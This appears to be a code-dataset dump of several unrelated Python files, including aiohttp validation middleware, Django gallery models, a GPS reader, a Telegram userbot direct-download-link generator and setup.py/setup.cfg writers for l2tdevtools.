return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
EMPTY_MAP = 'Empty map'
FAILED_LOGIN = 'Failed to login'
FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
INITIALIZING = 'Initializing'
NOT_LOGGED_IN = 'Not logged in'
OK = 'OK'
LOGGED_IN = 'Logged in'
TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
UNABLE_TO_PARSE_MAP = 'Unable to parse map'
UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
def __str__(self):
return str(self._value_)
| 46.095122 | 119 | 0.66321 |
a44039d8ce3912d2f8fc07e24c678141a7fbe7df | 1,317 | py | Python | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | from aiohttp import web
from webargs.aiohttpparser import parser
from .utils import issubclass_py37fix
@web.middleware
async def validation_middleware(request: web.Request, handler) -> web.Response:
"""
Validation middleware for aiohttp web app
Usage:
.. code-block:: python
app.middlewares.append(validation_middleware)
"""
orig_handler = request.match_info.handler
if not hasattr(orig_handler, "__schemas__"):
if not issubclass_py37fix(orig_handler, web.View):
return await handler(request)
sub_handler = getattr(orig_handler, request.method.lower(), None)
if sub_handler is None:
return await handler(request)
if not hasattr(sub_handler, "__schemas__"):
return await handler(request)
schemas = sub_handler.__schemas__
else:
schemas = orig_handler.__schemas__
kwargs = {}
for schema in schemas:
ls = schema["locations"]
if ls and 'path' in ls:
ls[0] = 'match_info'
data = await parser.parse(
schema["schema"], request, locations=ls
)
if data:
kwargs.update(data)
kwargs.update(request.match_info)
request[request.app["_apispec_request_data_name"]] = kwargs
return await handler(request)
| 29.266667 | 79 | 0.655277 |
56e3d85b40d2935c185644262fb1510e63e163c4 | 1,565 | py | Python | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | null | null | null | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | 3 | 2020-02-12T03:16:00.000Z | 2021-06-10T22:04:14.000Z | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | null | null | null | from django.db import models
import datetime as dt
class Category(models.Model):
cate = models.CharField(max_length =30)
def save_cate(self):
self.save()
def dele_cate(self):
self.delete()
def __str__(self):
return self.cate
class Location(models.Model):
location = models.CharField(max_length =30)
def save_loca(self):
self.save()
def dele_loca(self):
self.delete()
def __str__(self):
return self.location
class Photos(models.Model):
image = models.ImageField(upload_to = 'photos/',null=True)
name = models.CharField(max_length =40)
descri = models.TextField(max_length =6000)
pub_date = models.DateTimeField(auto_now_add=True)
cate = models.ForeignKey(Category)
loca = models.ForeignKey(Location ,null=True)
def save_pic(self):
self.save()
@classmethod
def search_by_cate(cls,search):
categories = cls.objects.filter(cate__cate__icontains=search)
return categories
def dele_pic(self):
self.delete()
@classmethod
def image_by_id(cls,id):
found = cls.objects.filter(id = id)
return found
@classmethod
def filter_loca(cls,location):
imaje = cls.objects.filter(loca__location__icontains=location)
return imaje
@classmethod
def update_pic(cls,id):
imaje = cls.objects.filter(id=id).update(id=id)
return imaje
def __str__(self):
return self.name | 24.076923 | 70 | 0.625559 |
718455f4106f3178576e6216074bd1e1ffd6867a | 1,817 | py | Python | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | from gps import *
import time
import threading
import math
class GpsController(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.gpsd = gps(mode=WATCH_ENABLE) #starting the stream of info
self.running = False
def run(self):
self.running = True
while self.running:
# grab EACH set of gpsd info to clear the buffer
self.gpsd.next()
def stopController(self):
self.running = False
@property
def fix(self):
return self.gpsd.fix
@property
def utc(self):
return self.gpsd.utc
@property
def satellites(self):
return self.gpsd.satellites
if __name__ == '__main__':
# create the controller
gpsc = GpsController()
try:
# start controller
gpsc.start()
while True:
print "latitude ", gpsc.fix.latitude
print "longitude ", gpsc.fix.longitude
print "time utc ", gpsc.utc, " + ", gpsc.fix.time
print "altitude (m)", gpsc.fix.altitude
print "eps ", gpsc.fix.eps
print "epx ", gpsc.fix.epx
print "epv ", gpsc.fix.epv
print "ept ", gpsc.gpsd.fix.ept
print "speed (m/s) ", gpsc.fix.speed
print "climb ", gpsc.fix.climb
print "track ", gpsc.fix.track
print "mode ", gpsc.fix.mode
print "sats ", gpsc.satellites
time.sleep(0.5)
#Ctrl C
except KeyboardInterrupt:
print "User cancelled"
#Error
except:
print "Unexpected error:", sys.exc_info()[0]
raise
finally:
print "Stopping gps controller"
gpsc.stopController()
#wait for the tread to finish
gpsc.join()
print "Done"
| 25.591549 | 71 | 0.564117 |
81377bb559733d6523d41806be02209655d5288b | 1,391 | py | Python | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import c7n_gcp.policy
import c7n_gcp.resources.bigquery
import c7n_gcp.resources.build
import c7n_gcp.resources.compute
import c7n_gcp.resources.function
import c7n_gcp.resources.gke
import c7n_gcp.resources.iam
import c7n_gcp.resources.logging
import c7n_gcp.resources.network
import c7n_gcp.resources.pubsub
import c7n_gcp.resources.resourcemanager
import c7n_gcp.resources.service
import c7n_gcp.resources.source
import c7n_gcp.resources.storage
import c7n_gcp.resources.sql # noqa: F401
from c7n_gcp.provider import resources as gcp_resources
logging.getLogger('googleapiclient.discovery').setLevel(logging.WARNING)
# Let resource registry subscribers have a chance to look at full set of resources.
gcp_resources.notify(gcp_resources.EVENT_FINAL)
def initialize_gcp():
pass
| 32.348837 | 83 | 0.813803 |
a369ba5bca09b2ade8917d332a0b9de4eee8de30 | 12,873 | py | Python | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing various sites direct links generators"""
from subprocess import PIPE, Popen
import re
import urllib.parse
import json
from random import choice
import requests
from bs4 import BeautifulSoup
from humanize import naturalsize
from userbot import CMD_HELP
from userbot.events import register
def subprocess_run(cmd):
reply = ""
subproc = Popen(cmd, stdout=PIPE, stderr=PIPE,
shell=True, universal_newlines=True)
talk = subproc.communicate()
exitCode = subproc.returncode
if exitCode != 0:
reply += ('```An error was detected while running the subprocess:\n'
f'exit code: {exitCode}\n'
f'stdout: {talk[0]}\n'
f'stderr: {talk[1]}```')
return reply
return talk
@register(outgoing=True, pattern=r"^.dir(?: |$)([\s\S]*)")
async def direct_link_generator(request):
""" direct links generator """
await request.edit("`Processing...`")
textx = await request.get_reply_message()
message = request.pattern_match.group(1)
if message:
pass
elif textx:
message = textx.text
else:
await request.edit("`Usage: .direct <url>`")
return
reply = ''
links = re.findall(r'\bhttps?://.*\.\S+', message)
if not links:
reply = "`No links found!`"
await request.edit(reply)
for link in links:
if 'drive.google.com' in link:
reply += gdrive(link)
elif 'zippyshare.com' in link:
reply += zippy_share(link)
elif 'mega.' in link:
reply += mega_dl(link)
elif 'yadi.sk' in link:
reply += yandex_disk(link)
elif 'cloud.mail.ru' in link:
reply += cm_ru(link)
elif 'mediafire.com' in link:
reply += mediafire(link)
elif 'sourceforge.net' in link:
reply += sourceforge(link)
elif 'osdn.net' in link:
reply += osdn(link)
elif 'github.com' in link:
reply += github(link)
elif 'androidfilehost.com' in link:
reply += androidfilehost(link)
else:
reply += re.findall(r"\bhttps?://(.*?[^/]+)",
link)[0] + 'is not supported'
await request.edit(reply)
def gdrive(url: str) -> str:
""" GDrive direct links generator """
drive = 'https://drive.google.com'
try:
link = re.findall(r'\bhttps?://drive\.google\.com\S+', url)[0]
except IndexError:
reply = "`No Google drive links found`\n"
return reply
file_id = ''
reply = ''
if link.find("view") != -1:
file_id = link.split('/')[-2]
elif link.find("open?id=") != -1:
file_id = link.split("open?id=")[1].strip()
elif link.find("uc?id=") != -1:
file_id = link.split("uc?id=")[1].strip()
url = f'{drive}/uc?export=download&id={file_id}'
download = requests.get(url, stream=True, allow_redirects=False)
cookies = download.cookies
try:
# In case of small file size, Google downloads directly
dl_url = download.headers["location"]
if 'accounts.google.com' in dl_url: # non-public file
reply += '`Link is not public!`\n'
return reply
name = 'Direct Download Link'
except KeyError:
# In case of download warning page
page = BeautifulSoup(download.content, 'lxml')
export = drive + page.find('a', {'id': 'uc-download-link'}).get('href')
name = page.find('span', {'class': 'uc-name-size'}).text
response = requests.get(export,
stream=True,
allow_redirects=False,
cookies=cookies)
dl_url = response.headers['location']
if 'accounts.google.com' in dl_url:
reply += 'Link is not public!'
return reply
reply += f'[{name}]({dl_url})\n'
return reply
def zippy_share(url: str) -> str:
""" ZippyShare direct links generator
Based on https://github.com/LameLemon/ziggy"""
reply = ''
dl_url = ''
try:
link = re.findall(r'\bhttps?://.*zippyshare\.com\S+', url)[0]
except IndexError:
reply = "`No ZippyShare links found`\n"
return reply
session = requests.Session()
base_url = re.search('http.+.com', link).group()
response = session.get(link)
page_soup = BeautifulSoup(response.content, "lxml")
scripts = page_soup.find_all("script", {"type": "text/javascript"})
for script in scripts:
if "getElementById('dlbutton')" in script.text:
url_raw = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('url')
math = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
script.text).group('math')
dl_url = url_raw.replace(math, '"' + str(eval(math)) + '"')
break
dl_url = base_url + eval(dl_url)
name = urllib.parse.unquote(dl_url.split('/')[-1])
reply += f'[{name}]({dl_url})\n'
return reply
def yandex_disk(url: str) -> str:
""" Yandex.Disk direct links generator
Based on https://github.com/wldhx/yadisk-direct"""
reply = ''
try:
link = re.findall(r'\bhttps?://.*yadi\.sk\S+', url)[0]
except IndexError:
reply = "`No Yandex.Disk links found`\n"
return reply
api = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
try:
dl_url = requests.get(api.format(link)).json()['href']
name = dl_url.split('filename=')[1].split('&disposition')[0]
reply += f'[{name}]({dl_url})\n'
except KeyError:
reply += '`Error: File not found / Download limit reached`\n'
return reply
return reply
def mega_dl(url: str) -> str:
""" MEGA.nz direct links generator
Using https://github.com/tonikelope/megadown"""
reply = ''
try:
link = re.findall(r'\bhttps?://.*mega.*\.nz\S+', url)[0]
except IndexError:
reply = "`No MEGA.nz links found`\n"
return reply
cmd = f'bin/megadown -q -m {link}'
result = subprocess_run(cmd)
try:
data = json.loads(result[0])
except json.JSONDecodeError:
reply += "`Error: Can't extract the link`\n"
return reply
except IndexError:
return reply
dl_url = data['url']
name = data['file_name']
size = naturalsize(int(data['file_size']))
reply += f'[{name} ({size})]({dl_url})\n'
return reply
def cm_ru(url: str) -> str:
""" cloud.mail.ru direct links generator
Using https://github.com/JrMasterModelBuilder/cmrudl.py"""
reply = ''
try:
link = re.findall(r'\bhttps?://.*cloud\.mail\.ru\S+', url)[0]
except IndexError:
reply = "`No cloud.mail.ru links found`\n"
return reply
cmd = f'bin/cmrudl -s {link}'
result = subprocess_run(cmd)
try:
result = result[0].splitlines()[-1]
data = json.loads(result)
except json.decoder.JSONDecodeError:
reply += "`Error: Can't extract the link`\n"
return reply
except IndexError:
return reply
dl_url = data['download']
name = data['file_name']
size = naturalsize(int(data['file_size']))
reply += f'[{name} ({size})]({dl_url})\n'
return reply
def mediafire(url: str) -> str:
""" MediaFire direct links generator """
try:
link = re.findall(r'\bhttps?://.*mediafire\.com\S+', url)[0]
except IndexError:
reply = "`No MediaFire links found`\n"
return reply
reply = ''
page = BeautifulSoup(requests.get(link).content, 'lxml')
info = page.find('a', {'aria-label': 'Download file'})
dl_url = info.get('href')
size = re.findall(r'\(.*\)', info.text)[0]
name = page.find('div', {'class': 'filename'}).text
reply += f'[{name} {size}]({dl_url})\n'
return reply
def sourceforge(url: str) -> str:
""" SourceForge direct links generator """
try:
link = re.findall(r'\bhttps?://.*sourceforge\.net\S+', url)[0]
except IndexError:
reply = "`No SourceForge links found`\n"
return reply
file_path = re.findall(r'files(.*)/download', link)[0]
reply = f"Mirrors for __{file_path.split('/')[-1]}__\n"
project = re.findall(r'projects?/(.*?)/files', link)[0]
mirrors = f'https://sourceforge.net/settings/mirror_choices?' \
f'projectname={project}&filename={file_path}'
page = BeautifulSoup(requests.get(mirrors).content, 'html.parser')
info = page.find('ul', {'id': 'mirrorList'}).findAll('li')
for mirror in info[1:]:
name = re.findall(r'\((.*)\)', mirror.text.strip())[0]
dl_url = f'https://{mirror["id"]}.dl.sourceforge.net/project/{project}/{file_path}'
reply += f'[{name}]({dl_url}) '
return reply
def osdn(url: str) -> str:
""" OSDN direct links generator """
osdn_link = 'https://osdn.net'
try:
link = re.findall(r'\bhttps?://.*osdn\.net\S+', url)[0]
except IndexError:
reply = "`No OSDN links found`\n"
return reply
page = BeautifulSoup(
requests.get(link, allow_redirects=True).content, 'lxml')
info = page.find('a', {'class': 'mirror_link'})
link = urllib.parse.unquote(osdn_link + info['href'])
reply = f"Mirrors for __{link.split('/')[-1]}__\n"
mirrors = page.find('form', {'id': 'mirror-select-form'}).findAll('tr')
for data in mirrors[1:]:
mirror = data.find('input')['value']
name = re.findall(r'\((.*)\)', data.findAll('td')[-1].text.strip())[0]
dl_url = re.sub(r'm=(.*)&f', f'm={mirror}&f', link)
reply += f'[{name}]({dl_url}) '
return reply
def github(url: str) -> str:
""" GitHub direct links generator """
try:
link = re.findall(r'\bhttps?://.*github\.com.*releases\S+', url)[0]
except IndexError:
reply = "`No GitHub Releases links found`\n"
return reply
reply = ''
dl_url = ''
download = requests.get(url, stream=True, allow_redirects=False)
try:
dl_url = download.headers["location"]
except KeyError:
reply += "`Error: Can't extract the link`\n"
name = link.split('/')[-1]
reply += f'[{name}]({dl_url}) '
return reply
def androidfilehost(url: str) -> str:
""" AFH direct links generator """
try:
link = re.findall(r'\bhttps?://.*androidfilehost.*fid.*\S+', url)[0]
except IndexError:
reply = "`No AFH links found`\n"
return reply
fid = re.findall(r'\?fid=(.*)', link)[0]
session = requests.Session()
user_agent = useragent()
headers = {'user-agent': user_agent}
res = session.get(link, headers=headers, allow_redirects=True)
headers = {
'origin': 'https://androidfilehost.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9',
'user-agent': user_agent,
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'x-mod-sbb-ctype': 'xhr',
'accept': '*/*',
'referer': f'https://androidfilehost.com/?fid={fid}',
'authority': 'androidfilehost.com',
'x-requested-with': 'XMLHttpRequest',
}
data = {
'submit': 'submit',
'action': 'getdownloadmirrors',
'fid': f'{fid}'
}
mirrors = None
reply = ''
error = "`Error: Can't find Mirrors for the link`\n"
try:
req = session.post(
'https://androidfilehost.com/libs/otf/mirrors.otf.php',
headers=headers,
data=data,
cookies=res.cookies)
mirrors = req.json()['MIRRORS']
except (json.decoder.JSONDecodeError, TypeError):
reply += error
if not mirrors:
reply += error
return reply
for item in mirrors:
name = item['name']
dl_url = item['url']
reply += f'[{name}]({dl_url}) '
return reply
def useragent():
"""
useragent random setter
"""
useragents = BeautifulSoup(
requests.get(
'https://developers.whatismybrowser.com/'
'useragents/explore/operating_system_name/android/').content,
'lxml').findAll('td', {'class': 'useragent'})
user_agent = choice(useragents)
return user_agent.text
CMD_HELP.update({
"direct":
">`.dir <url>`"
"\nUsage: Reply to a link or paste a URL to\n"
"generate a direct download link\n\n"
"List of supported URLs:\n"
"`Google Drive - MEGA.nz - Cloud Mail - Yandex.Disk - AFH - "
"ZippyShare - MediaFire - SourceForge - OSDN - GitHub`"
})
| 34.236702 | 91 | 0.574225 |
732ad0dfe6e7089832beb01c637675ca162227f6 | 2,231 | py | Python | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-present Kensho Technologies, LLC.
from collections import namedtuple
from six.moves.urllib.parse import quote_plus
from .. import test_backend
DEFAULT_ROOT_PASSWORD = "root" # nosec
SQL_BACKENDS = {
test_backend.POSTGRES,
test_backend.MYSQL,
test_backend.MARIADB,
test_backend.MSSQL,
test_backend.SQLITE,
}
# sqlite does not require that a DB be created/dropped for testing
EXPLICIT_DB_BACKENDS = {
test_backend.POSTGRES,
test_backend.MYSQL,
test_backend.MARIADB,
test_backend.MSSQL,
}
MATCH_BACKENDS = {
test_backend.ORIENTDB,
}
# Split Neo4j and RedisGraph because RedisGraph doesn't support all Neo4j features.
NEO4J_BACKENDS = {
test_backend.NEO4J,
}
REDISGRAPH_BACKENDS = {
test_backend.REDISGRAPH,
}
pyodbc_parameter_string = "DRIVER={driver};SERVER={server};UID={uid};PWD={pwd}".format( # nosec
driver="{ODBC Driver 17 for SQL SERVER}",
server="127.0.0.1,1434", # Do not change to 'localhost'.
# You won't be able to connect with the db.
uid="SA", # System Administrator.
pwd="Root-secure1",
)
# delimeters must be URL escaped
escaped_pyodbc_parameter_string = quote_plus(pyodbc_parameter_string)
SQL_BACKEND_TO_CONNECTION_STRING = {
# HACK(bojanserafimov): Entries are commented-out because MSSQL is the only one whose scheme
# initialization is properly configured, with a hierarchy of multiple
# databases and schemas. I'm keeping the code to remember the connection
# string formats.
#
test_backend.POSTGRES: "postgresql://postgres:{password}@localhost:5433".format(
password=DEFAULT_ROOT_PASSWORD
),
# test_backend.MYSQL:
# 'mysql://root:{password}@127.0.0.1:3307'.format(password=DEFAULT_ROOT_PASSWORD),
# test_backend.MARIADB:
# 'mysql://root:{password}@127.0.0.1:3308'.format(password=DEFAULT_ROOT_PASSWORD),
test_backend.MSSQL: "mssql+pyodbc:///?odbc_connect={}".format(escaped_pyodbc_parameter_string),
# test_backend.SQLITE:
# 'sqlite:///:memory:',
}
SqlTestBackend = namedtuple(
"SqlTestBackend",
(
"engine",
"base_connection_string",
),
)
| 29.355263 | 99 | 0.693411 |
11f8904b17b36bb939353a0df4d4c5030aa09952 | 13,685 | py | Python | l2tdevtools/dependency_writers/setup.py | log2timeline/l2tdevtools | 6f328a0fe72f243ff6e454397ea405c65bae9424 | [
"Apache-2.0"
] | 6 | 2015-08-07T12:53:10.000Z | 2022-02-18T02:59:51.000Z | l2tdevtools/dependency_writers/setup.py | joachimmetz/l2tdevtools | 45048601cebfc73d1f35c5dcdd8e913769ca660f | [
"Apache-2.0"
] | 700 | 2015-02-23T06:55:06.000Z | 2022-03-12T16:43:50.000Z | l2tdevtools/dependency_writers/setup.py | joachimmetz/l2tdevtools | 45048601cebfc73d1f35c5dcdd8e913769ca660f | [
"Apache-2.0"
] | 21 | 2015-03-28T10:29:23.000Z | 2021-08-12T04:56:18.000Z | # -*- coding: utf-8 -*-
"""Writer for setup configuration and script files."""
import glob
import io
import os
import textwrap
from l2tdevtools.dependency_writers import interface
class SetupCfgWriter(interface.DependencyFileWriter):
"""Setup configuration file writer."""
PATH = 'setup.cfg'
_DOC_FILES = ('ACKNOWLEDGEMENTS', 'AUTHORS', 'LICENSE', 'README')
_PROJECTS_WITH_SDIST_TEST_DATA = (
'dfvfs', 'dfwinreg', 'plaso')
_TEMPLATE_DIRECTORY = os.path.join('data', 'templates', 'setup.cfg')
def _GenerateFromTemplate(self, template_filename, template_mappings):
"""Generates file context based on a template file.
Args:
template_filename (str): path of the template file.
template_mappings (dict[str, str]): template mappings, where the key
maps to the name of a template variable.
Returns:
str: output based on the template string.
Raises:
RuntimeError: if the template cannot be formatted.
"""
template_filename = os.path.join(
self._l2tdevtools_path, self._TEMPLATE_DIRECTORY, template_filename)
return super(SetupCfgWriter, self)._GenerateFromTemplate(
template_filename, template_mappings)
def Write(self):
"""Writes a setup.cfg file."""
doc_files = [
doc_file for doc_file in self._DOC_FILES if os.path.isfile(doc_file)]
formatted_doc_files = []
for index, doc_file in enumerate(sorted(doc_files)):
if index == 0:
line = 'doc_files = {0:s}'.format(doc_file)
else:
line = ' {0:s}'.format(doc_file)
formatted_doc_files.append(line)
python3_dependencies = self._dependency_helper.GetRPMRequires()
formatted_requires = []
for index, dependency in enumerate(python3_dependencies):
if index == 0:
line = 'requires = {0:s}'.format(dependency)
else:
line = ' {0:s}'.format(dependency)
formatted_requires.append(line)
formatted_requires.append('')
template_mappings = {
'doc_files': '\n'.join(formatted_doc_files),
'maintainer': self._project_definition.maintainer,
'requires': '\n'.join(formatted_requires)}
file_content = []
template_data = self._GenerateFromTemplate('metadata', template_mappings)
file_content.append(template_data)
if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
template_data = self._GenerateFromTemplate(
'sdist_test_data', template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate('bdist_rpm', template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate('bdist_wheel', template_mappings)
file_content.append(template_data)
file_content = ''.join(file_content)
with io.open(self.PATH, 'w', encoding='utf-8') as file_object:
file_object.write(file_content)
class SetupPyWriter(interface.DependencyFileWriter):
"""Setup script file writer."""
PATH = os.path.join('setup.py')
_DOC_FILES = ('ACKNOWLEDGEMENTS', 'AUTHORS', 'LICENSE', 'README')
_PROJECTS_WITH_PACKAGE_DATA = (
'dfvfs', 'dfwinreg', 'dtformats', 'plaso', 'winregrc')
_PROJECTS_WITH_PYTHON3_AS_DEFAULT = ('plaso', )
_PROJECTS_WITH_SDIST_TEST_DATA = (
'dfvfs', 'dfwinreg', 'plaso')
_TEMPLATE_DIRECTORY = os.path.join('data', 'templates', 'setup.py')
def _DetermineSubmoduleLevels(self, project_name):
"""Determines the number of submodule levels.
Args:
project_name (str): name of the project.
Return:
int: number of submodule levels.
"""
submodule_glob = project_name
submodule_levels = 0
while submodule_levels < 10:
submodule_glob = '{0:s}/*'.format(submodule_glob)
submodule_paths = [
path for path in glob.glob(submodule_glob)
if os.path.isdir(path) and os.path.basename(path) != '__pycache__']
if not submodule_paths:
break
submodule_levels += 1
return submodule_levels
def _GenerateFromTemplate(self, template_filename, template_mappings):
"""Generates file context based on a template file.
Args:
template_filename (str): path of the template file.
template_mappings (dict[str, str]): template mappings, where the key
maps to the name of a template variable.
Returns:
str: output based on the template string.
Raises:
RuntimeError: if the template cannot be formatted.
"""
template_filename = os.path.join(
self._l2tdevtools_path, self._TEMPLATE_DIRECTORY, template_filename)
return super(SetupPyWriter, self)._GenerateFromTemplate(
template_filename, template_mappings)
def Write(self):
"""Writes a setup.py file."""
# Width is 80 characters minus 4 spaces, 2 single quotes and 1 comma.
text_wrapper = textwrap.TextWrapper(drop_whitespace=False, width=73)
description_short = text_wrapper.wrap(
self._project_definition.description_short)
description_short = '\n'.join([
' \'{0:s}\''.format(line) for line in description_short])
description_long = text_wrapper.wrap(
self._project_definition.description_long)
description_long = '\n'.join([
' \'{0:s}\''.format(line) for line in description_long])
if self._project_definition.name in self._PROJECTS_WITH_PYTHON3_AS_DEFAULT:
shebang = '#!/usr/bin/env python3'
else:
shebang = '#!/usr/bin/env python'
if self._project_definition.name in ('artifacts', 'plaso'):
data_files_path = 'share/{0:s}'.format(self._project_definition.name)
else:
data_files_path = 'share/{0:s}/data'.format(self._project_definition.name)
doc_files = [
doc_file for doc_file in self._DOC_FILES if os.path.isfile(doc_file)]
maintainer = self._project_definition.maintainer
maintainer, _, maintainer_email = maintainer.rpartition('<')
maintainer_email, _, _ = maintainer_email.rpartition('>')
if self._project_definition.status == 'experimental':
development_status = 'Development Status :: 2 - Pre-Alpha'
elif self._project_definition.status == 'alpha':
development_status = 'Development Status :: 3 - Alpha'
elif self._project_definition.status == 'beta':
development_status = 'Development Status :: 4 - Beta'
elif self._project_definition.status == 'stable':
development_status = 'Development Status :: 5 - Production/Stable'
else:
development_status = ''
packages_exclude = ['tests', 'tests.*', 'utils']
if os.path.isdir('docs'):
packages_exclude.append('docs')
data_directory = None
if os.path.isdir('data'):
data_directory = 'data'
scripts_directory = None
if os.path.isdir('scripts'):
scripts_directory = 'scripts'
elif os.path.isdir('tools'):
scripts_directory = 'tools'
if scripts_directory:
packages_exclude.append(scripts_directory)
packages_exclude = ', '.join([
'\'{0:s}\''.format(exclude) for exclude in sorted(packages_exclude)])
submodule_levels = self._DetermineSubmoduleLevels(
self._project_definition.name)
python3_package_module_prefix = '%{{{{python3_sitelib}}}}/{0:s}'.format(
self._project_definition.name)
python3_package_files = [
'{0:s}/*.py'.format(python3_package_module_prefix)]
yaml_glob = os.path.join(python3_package_module_prefix[21:], '*.yaml')
if glob.glob(yaml_glob):
python3_package_files.append(
'{0:s}/*.yaml'.format(python3_package_module_prefix))
for _ in range(submodule_levels):
python3_package_module_prefix = '{0:s}/*'.format(
python3_package_module_prefix)
python3_package_files.append(
'{0:s}/*.py'.format(python3_package_module_prefix))
yaml_glob = os.path.join(python3_package_module_prefix[21:], '*.yaml')
if glob.glob(yaml_glob):
python3_package_files.append(
'{0:s}/*.yaml'.format(python3_package_module_prefix))
python3_package_files.extend([
'%{{python3_sitelib}}/{0:s}*.egg-info/*',
'',
'%exclude %{{_prefix}}/share/doc/*'])
python3_package_module_prefix = '%{{{{python3_sitelib}}}}/{0:s}'.format(
self._project_definition.name)
python3_package_files.append(
'%exclude {0:s}/__pycache__/*'.format(python3_package_module_prefix))
for _ in range(submodule_levels):
python3_package_module_prefix = '{0:s}/*'.format(
python3_package_module_prefix)
python3_package_files.append(
'%exclude {0:s}/__pycache__/*'.format(python3_package_module_prefix))
if not data_directory and scripts_directory:
python3_package_files.append('%exclude %{{_bindir}}/*.py')
python3_package_files = ',\n'.join([
' \'{0:s}\''.format(package_file)
for package_file in python3_package_files])
python3_package_files = python3_package_files.format(
self._project_definition.name)
rpm_doc_files = [
doc_file for doc_file in doc_files if doc_file != 'LICENSE']
rpm_license_file = 'LICENSE'
template_mappings = {
'data_files_path': data_files_path,
'doc_files': ', '.join([
'\'{0:s}\''.format(doc_file) for doc_file in doc_files]),
'description_long': description_long,
'description_short': description_short,
'development_status': development_status,
'homepage_url': self._project_definition.homepage_url,
'maintainer': maintainer.strip(),
'maintainer_email': maintainer_email.strip(),
'packages_exclude': packages_exclude,
'project_name_description': self._project_definition.name_description,
'project_name': self._project_definition.name,
'python3_package_files': python3_package_files,
'rpm_doc_files': ' '.join(rpm_doc_files),
'rpm_license_file': rpm_license_file,
'shebang': shebang,
'scripts_directory': scripts_directory,
}
if self._project_definition.name in self._PROJECTS_WITH_PACKAGE_DATA:
if self._project_definition.name == 'dfvfs':
package_data_paths = ['dfvfs.lib']
elif self._project_definition.name == 'plaso':
package_data_paths = [
'plaso.parsers', 'plaso.parsers.esedb_plugins',
'plaso.parsers.olecf_plugins', 'plaso.parsers.plist_plugins',
'plaso.parsers.winreg_plugins']
elif self._project_definition.name == 'winreg-kb':
package_data_paths = ['winregrc']
else:
package_data_paths = [self._project_definition.name]
template_mappings['package_data_paths'] = ',\n'.join([
' \'{0:s}\': [\'*.yaml\']'.format(path)
for path in package_data_paths])
file_content = []
if scripts_directory:
template_data = self._GenerateFromTemplate(
'header_scripts', template_mappings)
else:
template_data = self._GenerateFromTemplate(
'header', template_mappings)
file_content.append(template_data)
